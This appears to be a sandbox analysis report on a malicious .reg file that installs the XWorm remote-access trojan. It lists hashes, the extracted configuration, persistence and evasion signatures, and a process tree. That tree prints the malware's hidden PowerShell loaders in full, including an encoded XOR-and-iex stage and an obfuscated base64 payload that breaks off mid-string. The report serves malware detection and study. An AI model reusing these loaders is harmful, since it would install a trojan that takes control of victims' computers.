Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 20:34 UTC

General

  • Target

    B4VVtERhIuUi.reg

  • Size

    67KB

  • MD5

    f0e94218233968b75d2ddb2040dc6617

  • SHA1

    4f0e5778a92de896a753d924085e163130fb5584

  • SHA256

    8f0700c47b590a8072cc4e12e3016788b678ffffbddb87883646697b39337074

  • SHA512

    da863d750ae25545d6ff7f2dfbc78cc971d6332f14571da47cf88ab7a36ce60ce52f7c786420e322ffbd006d96b400339f3b9a6e0aa7c49c6f84855bd6180b0b

  • SSDEEP

    1536:D4g540DoR+MQRxYvgUV/AV18G84p1V2ktjiEmpKXS4D18WsPHDqRO:DXmE0vPmMjkwpKpjsPHDqRO

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:2024

Mutex

IPatGZ2f5mZd3uic

Attributes
  • install_file

    USB.exe

aes.plain
1
VFR4lThzzn2hucxS0zBnPA==

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • System Binary Proxy Execution: Regsvcs/Regasm 1 TTPs 2 IoCs

    Abuse Regasm to proxy execution of malicious code.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\regedit.exe
    regedit.exe "C:\Users\Admin\AppData\Local\Temp\B4VVtERhIuUi.reg"
    1⤵
    • Adds Run key to start application
    • Runs .reg file with regedit
    PID:4004
  • C:\Windows\regedit.exe
    "C:\Windows\regedit.exe"
    1⤵
    • Runs regedit.exe
    • Suspicious behavior: GetForegroundWindowSpam
    PID:4076
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAUABiAEQAUgBpAFIARgBkAEcAWABXAG8AbQBQAG4AOQBkAE8ARwBKAGEAWgBrAFoATwBaADEAOQBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Binary Proxy Execution: Regsvcs/Regasm
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand  
         $ M F q B q C u q   =   7 6 8 5  
         $ D M O a V j N e   =   ( [ M a t h ] : : S q r t ( $ G J r W k Z t s )   *   2 3 ) . T o S t r i n g ( )  
         $ E x g F x U T E   =   " 7 "  
         $ H y U O Y A L b   =   " O "  
         $ c o k M O n P n   =   " 7 "  
         $ W h m v w o L m   =   " P "  
         $ e w F i O y Z m   =   " A "  
         $ K b Z w E D a Q   =   " J "  
         $ Q F c z v s d a   =   " B "  
         $ j p B o A r R Y   =   " K "  
         $ n n S C g r s w   =   " f "  
         $ X N k v l j k O   =   " T "  
         $ i E g E A l i M   =   " C "  
         $ Y M y k p x a Z   =   " i "  
         $ p c T J B Y L N   =   " z "  
         $ M p S V n j X H   =   " X "  
         $ S M m A H q u s   =   " A "  
         $ p R A r i v O e   =   " U "  
         $ t 1   =   1 3   +   3 3  
         $ t 2   =   ( $ t 1   *   7 )   -   ( $ t 1   /   6 )  
         $ t 3   =   " 7 "   +   " O "   +   " 7 "   +   " P "   +   " A "  
         $ t 4   =   " J "   +   " B "   +   " K "   +   " f "   +   " T "  
         $ t 5   =   " C "   +   " i "   +   " z "   +   " X "   +   " A "   +   " U "  
         $ p   =   $ t 3   +   $ t 4   +   $ t 5  
         $ a   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ p )  
         $ d   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " W p V b 3 Z 9 1 T U u D O 5 A f h 7 W d L Z Y P c 5 B G v b s M k F D W s R a 0 e 2 3 D U g W G l z B G e b N o I T B 5 M u 7 B H 3 J z w n m C 4 h 3 5 I 0 c f w i 3 C b Z c M k n E C 5 R f W B X c 4 b C F Y 0 8 a 4 r A I I K C B j 1 s q G U v A M j y R u r d J T a O N 8 F T S T Z w T h Y Q m T j 5 H j M g R g h i G w g c x V d R y W 3 i u j D h B S K m z j V j 3 k w 8 x 2 o s 8 4 I s a N 4 q B 0 4 O V V k v D 0 4 b a I 4 2 W C p / T 8 X 5 v f 6 x B + 8 b O D C i 2 L 4 p T w y 8 C 9 l W b k k X R D p 2 V e m H g K V 2 A 6 B 3 F 8 j H a S u Q M c 4 I o S R L b 2 v F P A i 8 o P 4 t n / 4 k C D p W L a 8 P T I S 4 4 u i U h P o M u o A W 0 d K W d M h 7 g t 8 J O g G 5 P 8 n k H K / Q x D s 6 w k F p 9 / V 4 R T i E O g i C z 7 P U X p R r x 7 O 1 U o Q h m u + M 7 w 9 C H F 2 t 4 o E N m 1 B Q F r U C g K z m p q O y 8 e j + Y d U 5 T i a 1 D g S n U f 6 G j s Y Z j B p E c t z m m r S k k T L G r 8 f f X X r b j H U P f q X l W P B U H i C Q s + / t 0 3 Q F y O z Y 2 / W K j w s 3 U q v g 0 C K b e t d r c Y U 3 V v s o V 4 Q 0 n y Z 4 4 m 4 K E k h y v d K C z O n x X N / G d P Z 4 d s t x J x j o J U r m z 2 q l B J F b t I 0 i W 0 b T o y B 9 k T c U Y X h A v H y y 2 C f x 3 6 p P j R f J 6 n + a 1 7 W / Y N q a 8 d i g J + P x 1 K R 5 b 5 K W X g K 9 e l 7 I Z i A Q W P K w Y N l W i 6 4 h h b n e f D m H G z b G J 4 2 t F q k q f P W O q d W 6 i y u n t H D N G B K p w q 5 6 I n k A z W E n H N b / w o 4 x f t g 0 9 3 j D X V q / z m l m u I W v + X y i d Y P l Z X Q 2 Q o N P Q H o L q F 8 C M d s r V u o S f r 7 L F C W C U 1 q U x W f X s 8 v + 3 W V Y v S Y P f c v W m Q k w t W o y Y o O X 8 s k M D f 2 r z E W v G r n 0 h q 3 X D m t Y Z L n / + u R Y c d g K 1 / q w y i Y m 6 g Q p G m u a 0 V l 1 H W I A Z J x / 2 8 c K Y 3 s 9 F 7 y + 3 h m V d E s l f G l w U d 1 J k L D 5 z r J q G E B i t m x t D U p m q f P 8 4 B Z P w a G p h s k t 3 m f 8 Y e h 8 5 8 n V b Z j e Y L m / 6 1 0 A Y e I w E m H y C 4 7 6 1 W u u 8 v 0 4 / a Q N w / Z z l S T h p 9 b O O 9 o q G 7 h O L r U p z A P O a z u c U T d W s 9 C H S 7 Q U b X j / Z Y Z t q t f M v z I K 3 v n M 6 / 8 e Q X C a S 7 F g 4 3 j n n 5 t / 3 n J + p O N q B c S K F y b E p 3 X H N L s S u B N V V u m 2 T J v 1 7 V V O 7 T Q Q H Y w v R 7 b p 2 I H J s b Y G l A n p I c P j E q T j H h U k 6 f 5 m k B z S L E 8 3 L y b Y I 9 P F S T h G K f x 2 3 Z P b w V S m J x l j B t 5 W 6 z S 9 5 H 3 e 5 Y P s F 7 s 5 9 O F K 9 Z p g T o u Q 1 R q V x L v A r z o 5 R D 5 E r o l V 6 c E o L G 1 s q 4 O x c n Y 9 S C 5 T z 8 e n p D H C s j T H W C M j g G 9 J + X k 4 K 9 X a 3 K X A h w b R s p p H y Q m O j F e r 2 z C I u M J q P O k a 0 v d g Q s y w 8 b w O 8 4 l B p B e v s 5 u j G v 9 + g H d d J W U 5 n R 6 x P l U L E D 9 c X O n F m x a F H s 8 A T 1 B f d d d R Q M Y a 7 7 A K e 4 u v M Y 1 u j F Y q c 0 b + 4 q n x 7 3 Q d E K b F J B b j T M d c j Q 8 9 N e l W 5 W 5 M f A t G z c i N S N w b B k K M 1 m s E D H z h s 2 5 x 0 a a 0 5 m 6 T 9 M L M Q U V b z t 3 L l P 0 d t Z L b N g c x V 7 P X R j E x c q m X y M x t f 0 n w q J 9 j h P T B Y s x f j p P d h I X W 0 I P R + j H v m + F s B z b a B S I x q S A z 5 K 4 Z 1 W Q K l 5 b d Z D f i Z r d 0 g T E 6 C z s h K V F V N 0 f n y 8 0 T r s N E w C A d U X J a P O A k i J V l M n 9 j 6 u L 8 K D E H v D l X + L 2 5 H v F q q u H + X p b W A i j R P I 2 4 I I B U P x d N d M T o 2 a O s F L Z Q j r / r O / A 3 C k P B Z Q M Y P 0 Y 7 v 6 6 Q e 7 z b y B 8 A u V V f N A r C u L A n U C V 4 p j z e I L t a 5 T 3 l 3 P G T 8 W p B t 5 8 a S D w H B 2 s m 4 1 a i 5 E m a R r j X I Q 0 U U C g G O 0 P Q Q v w S 7 9 u I K z W 7 q l O C w N e U M z y C T 6 D o R T j O L Z u l m 6 G s n f c 6 E h Y P c n Z x y L g z c s l I J U N r 5 X Y 1 z m h b 0 7 X 3 C w C l A g 5 i 1 j J U v A o E x e l 0 Z F H + 6 o M t h 2 M 7 T j n Z H + 0 H o V 1 1 7 X t o K K m P b s F p g p t b M 8 d L p 2 o G c + U U o C I 1 n q F R F v S p z p g D s j 6 b i B O b 1 E O b x T h p H m M a 0 K B 0 m k Z E j s x w Q j b u d H w N G K j T C X z J l w W O H d j Y E u O 1 W V a N r o d r H R v m k 4 O o A 3 I 5 Z D e K V S H h P c i 8 w G H + o N a F o O T + n M 1 p f 1 v 9 z h t T 8 a q J C 8 c F u V f D E S h y k 3 U x a 5 w U X c l Y q + B a K D o + Y X K e U C j r f w r M a 5 g L E Y h h q I K f y 3 t X / I b 4 0 q R F y Q b P 5 e B B m Q / H h v + s J 6 W e i o x f j 7 l u Y 7 F U d p x 1 p I 1 u N O X e c 4 t T Y 7 F D t N p n y I Y n 2 g B B l 8 s n m Y D g x W o I Q H W E m a 9 u i M l 4 p 1 Z T 2 S 5 A A i X w m z y V W p O P d m 0 H r V v d a b 4 A Z D o 8 W u Y Z L i J d 7 q o A v b 6 V o X 2 V u V 2 8 F l w G Q D O U 7 G / U 0 d e Q E f 4 Q o 9 J J 8 z s 0 n r S t n r k 4 w C i h 9 z N m 6 p v D q n L v v r + W N t E z J Z A L / x i i W V / W V + N b N D G t F l m n Y M d B F U Z M j a T E J E x J d g 6 a P x L f H T x U x M Y 1 D / 3 t b S b 9 W Q o 7 Q 3 h 0 z v A H E 4 3 6 y / R G n 0 A / x g a U A Y o s 2 3 u U 3 F Z W l q Z 9 E A m 9 k L D K p i X Z 7 m L 5 Y q g f 8 L Y x 0 u W u I 0 c 6 2 L n 9 E a k 5 + A Q I K A e g C Q N k O 5 R + 3 + 4 2 G 9 G 1 b P M Y f M s r x j D 8 g F 4 2 + 5 o J 8 d K G U 3 J / n k j M 0 N x C W R A v D 2 9 y J S x s x v t 1 D n 6 O C M Z 9 g r h k K q A V + + N S 7 a m y b 3 P w U h T V 3 Q 1 p 3 a G 8 u v p p + + u X e J J h j n + 4 X / u N 1 H A C t 1 R T 9 c t a 3 B q 0 L i 7 g F x k Q Z J 3 5 O n B j 4 y d K O k q L d v Y q Q B c T e F l g y 8 h a K H u 8 M T n r L D 3 X S k 4 w U i f i 9 F w a y f O 9 S J T q Q f r 6 l j W + J g T w u E 2 i h s d w w 0 W g j x b y m g 4 h L H H j O k 5 F L Q X 4 R I M c n f 3 q L M 0 Q i 3 e h j 3 F L w v L N d o l R V k w / 1 O Y M 0 B D I a 8 a m q J k K b U h 1 j 7 A 3 Y E x o H a b L v D J j M j c F J 4 G 8 u P Q W f b r y M + P X x Q 3 P B + C 2 q G S D K x c p C J h u v K T l Y m j G M z u h f v f S c G L + 8 U 8 E P F Z P 6 d S Q S j s I A o K 8 8 8 J x z 9 7 S k S z z Q h r e 2 4 s P c Y S u v / R n 8 B 3 t q C N E I k B D 1 7 B w 2 F 3 5 M v M 9 v Q n r p R H t h 4 f 5 0 g A D u L A F X Q g R 3 x w 7 C t 9 k p F h v O R N 7 9 6 z q A x d Y R U a v x g R / p E h L l C t E O P z H p 8 F G j X y O I G M b 6 h p y V x X v A D a 3 W + T g b + U t P 6 9 q W s 7 7 S o K Z d j 4 C s I F g o V N q E L 2 I B e t q T 6 x + m 3 5 W G a N 2 K K + S H c U l j 7 B x g u Z P w K / x M 6 p a / F K C 9 O G f P s x F k r 4 H h T 2 n Q L + I A N d K y 4 N A 3 P a r Z s 1 t Y E G y x Q 1 X Q r b 6 3 p A I t i K x L k G H N W b 8 R A F i f f A j R C p U W H l y F g + N T L W 8 f m W 2 S 3 k D g N r v 1 k c 1 O M 9 e P i b I t v I 5 p 8 7 U j w w M y 8 e Q k B I I a l P p M R 8 3 + E T K o 6 z Y I Z d D U q d m J w B d Z g t D 1 4 b v H 0 r D 9 t N K 9 c i 2 0 c D 8 3 H K C E A C 3 4 / M h 9 j T U q 2 D d G Q j t U 9 Q 6 A w q N 3 0 7 Y o e Y f A x v c h 5 s 5 h b o 5 c b W B s w J h a Y G N B 8 + W 5 M E r 0 S V 5 W 3 I o 2 4 z k / e 1 I X x 5 0 d y Y q R k 6 9 W C H L T P q G Y Y X H c o 5 Z t h m Z C h s k 8 a s 0 K E m t H j k F F i V M P 2 s l l 6 a G n W L r 4 w m R L + w Q F y K I f P b S q 2 l b W i 7 A M / Y L Y + p X W T 8 m 9 j u Y 4 D N m D h d A 0 O P s r v s 7 3 g d V w I W A x b M O H 4 N j g S / L W y A f x H U s q d R a y f W m X q 0 7 w N Y d 2 W j W / 4 5 s o g T z d o X W s I m x 1 v g t P 5 V l w c s B Q N + 4 k A S m 9 Z X / G 9 f 6 R F T T w 4 A K f K Y v i F B Z D L x 9 z T b W s K A H M C p U r s O R P / j Y Z L y K v B 8 z 5 p u u U L H P l e d X w 5 j l P 9 k y C b f U z 4 C Z T B h s Y m + x L z s g r G w u M Y s 1 f X e 4 u 4 t 9 Q S B R D V F s D p H J j c R t 5 Z 6 I 4 8 / b d K z p q 5 y W C 3 x k G n K l h c 6 r u D 7 y h y Q M S j x W b 4 B w g D 3 3 / e 7 l n r Q 6 A s 1 0 v A S c L U V P 7 b 4 E R G p r o m B V i f K 9 h y h M e M a E 9 u B y O q C A W O p S l u y X s 0 M Z Q m r a e J W 6 o / k P S X J U b J p U j s 3 P 3 o l n n 6 N D x / H X I z j 3 o e T Q k s 8 / e M W d U 4 X P O p x G k m d y 6 o 1 c f k i V + z 4 f Y 0 / E j R P + a Z w 4 V y i L R 4 q Y 9 T T 2 z n f k w a u 2 3 t B B t m p D t 7 5 / p d 9 g F F i 7 4 E D x 9 p 1 n 8 n L X J N M l h 8 X j q h 8 P B E x N s y G R D z / Q M B o 4 t N q 7 o d H S x 0 y x C B q C E z N g q D 7 w h 8 z + X 9 p y z E + O F Y I N G G Q o i r W c Y k i 7 s P y u M y Y R + 2 R g g R Q + r s N Z W f z 0 M j c C l C K X r D W Y q / c 1 a T w a P e c y 0 G k I t L 2 f g y V p n A U u K 2 q 4 + R x X m c C N r K D Z 6 Y I x j Z 8 l H j Y n u L e T B 4 p l h c C a T o y I s 7 w 8 a j H z a p 3 T h q U H N q 1 v C M H M o J X 1 e Q w F F 2 d o Z v F N M 8 n E p z 1 Z E + c 6 W F p t b 8 J 5 U I l j Z 0 b K 1 J 0 U z L j P + v C e g W b E L 1 Y b y m 3 o 1 7 S 4 C W u 1 i u r f D Z i / q N 8 o u H N m 9 A / E m 5 0 8 s P t T r g 5 Z Z F y K + + i B A G v S N N D V F M M X I M p p L p v + y o d 2 / 5 A f k K N 6 M t I f 0 g R W R M + Q 8 f r S E r + w N h O m 1 B u v G H t 8 A b g P t J K J N F k q 3 H H e s y Q d w S G Q 8 T o W 4 J 2 i 1 + p j P r f h N O o R W K 4 8 B W g n w S B P g O r Z x D 4 s w 2 + N S Z 2 k r e d g 8 w O C l G 6 w K l 7 + 3 q f + u / T 9 R D M f h S z f 5 r Q G 3 I T g V b l x n N x b 3 9 Y u c d F P G N U y k b 3 j W j b l Q L d W 3 A c z g a 8 y X + P 3 p B B F 1 7 w T B m p a + 4 l Y q f O Q A l p S X B X H p 3 I R l V S S 5 y u 0 8 h D h Q u D 4 m b T n d + 7 P H 5 L 2 7 E + Y 1 m Z U x D 3 8 C t P h 6 r J d N M I b m U K S i 8 c 5 i L C N n S / 4 u + u Q t a T F C Z 4 2 T Y H F o j i + G 0 L T E T Q C j 7 h 4 m v P K S H f X F 3 t T Y S m d D T K M u N 6 p d I / j X Q j Y Q O f i t B 2 H G I C 5 8 Q i 1 y 7 f o Y 2 + F b w r y 5 M W 4 Y V g y B v g I U X F Q f P z u 5 k g A N i A + 1 4 t 0 h j T g i G B B 7 S p b x H R E Y 1 T s P U f 2 f Z k m t 9 Z S F + K P x D k D A W n + / g 9 V x d o B b p m N Q k 2 Y r B e 8 8 Y 9 h v k n g l W y R Y N + h q 9 u 7 A y y V R n 0 D b 4 I v H 9 / o C y v 8 d P n U 1 m E w q D g F 3 1 J X F r r G I 1 g U a b a z K a e 0 b / k 7 p Y F A O t C c g q z x J j Z e 1 + 0 w a H 6 I N E D j 4 0 G N j y r U G j z s T t q X k u l u / F J + + a T N h P q B 9 7 A n 8 Z 6 C 5 I k o w e l E q 9 4 m J f v 3 W S 6 M d / D U s k R w d U h p l q I y / o q E T g m K / n D B x f Q w x l G G c q B 6 f d D E q Z 5 U x y e b J e R w q V u Y 1 Z A F W u w z m A X q T H W 6 L c + m W n W q 9 s l e s i I 9 2 L 7 j m l + l E t U 8 g O / t z V P u 6 b c t / Y n i f W 4 N / d t j f + 6 + q p I i + l e g + c h 1 u p f V q H q z 4 Z d e / p + g R z W K l M x t e p f u i a Y j S z C H q V w J B 9 L s U + c a y e c M s 8 y s 1 1 C 5 n C T T F b T v K S 9 Y p M W y X t n + + F R 1 s Q R h k 3 B D 5 7 B o P 7 F R S 5 z 3 H i r 0 w g 6 h k a M W D + + r S n W i m z 7 7 G G y f D l m s s Q Y h L q 5 F b x V 1 W e x d 5 W s F S d p p y 4 g 7 c c k w A b S d 8 2 2 Y l h n G Z v Q K t 0 p 8 5 k Z c W k 3 d P n T t l r 7 H J e J X v 7 z i o 7 b 1 6 i h r 5 z T v V m R + 8 j 1 g F d W 5 3 4 g z j u 1 K p n n 4 K V u R Q 4 m r f J g T + r K 8 l H p k n M c k 5 N x V 9 L + k t u k t 3 u A k U M a u f r q M G + Q i u M s D j 8 U S g I z s Z 1 5 C y x T g j Q 1 W C X D T s 0 p y j v f U d O e o l l u O 6 A r L 0 F 9 V G u b h K 9 4 j m 8 5 o N 0 L c m r a g 9 H e v S g q 6 b 3 n J j k J a x / g 2 f R L M c L u P n U j 3 G n 0 I W X o o x 9 V U q v f g A M O 1 N A O a D x m 6 H q 9 e J 7 8 + i Z r 9 R R O 8 T M 3 m 6 9 8 k T X m p 8 e N P W 2 l x 6 o D A Q K F L L G L u / A e V R j G B i F G P X l B F g 7 M 4 / z d b T O v M a 1 g p h N p p l f H f i v N R x 7 V w M s + 0 8 f Q m z L h 8 h C H S z d D s k / w v e A D j r i X 7 f d E w q L P o 2 2 o U 8 x 2 l N / H L 6 F k e u 4 y Y x G r + 5 8 y V I q F s r 0 4 + c N 7 r 1 a + 5 A n i y w Z y g d 4 s 2 J T u y / 2 w W b N Q O 4 q p z t Z V 8 v / j j 2 0 z f z D c Q j + c 6 t 8 w w 0 Q S j M L o l O n R + 9 1 b V u o o a q p Y 1 M L z R l l Q L o 5 F Z v g H 2 L x Z C G I 1 Q s D n h L F C / 0 O X g M + m 3 x n p 6 L K a S 0 H s 8 E B l 4 K y M K K 7 p 8 n m l X E p + 6 S w m w g l 2 A C F b D 8 R J F i 8 o v n D + N r 1 L l K f Z D / + g 6 u M J g a W r + O x T / o D F c 3 K u H r g / 5 p u V W P v d 3 f k S 4 O 6 g / R W 2 V v g b a x n N T z t l 3 O t f l y J Y R C Z E L P Y / H N 9 A I B 2 v F Q R C 4 f V e T y C X I s P d I o d G 2 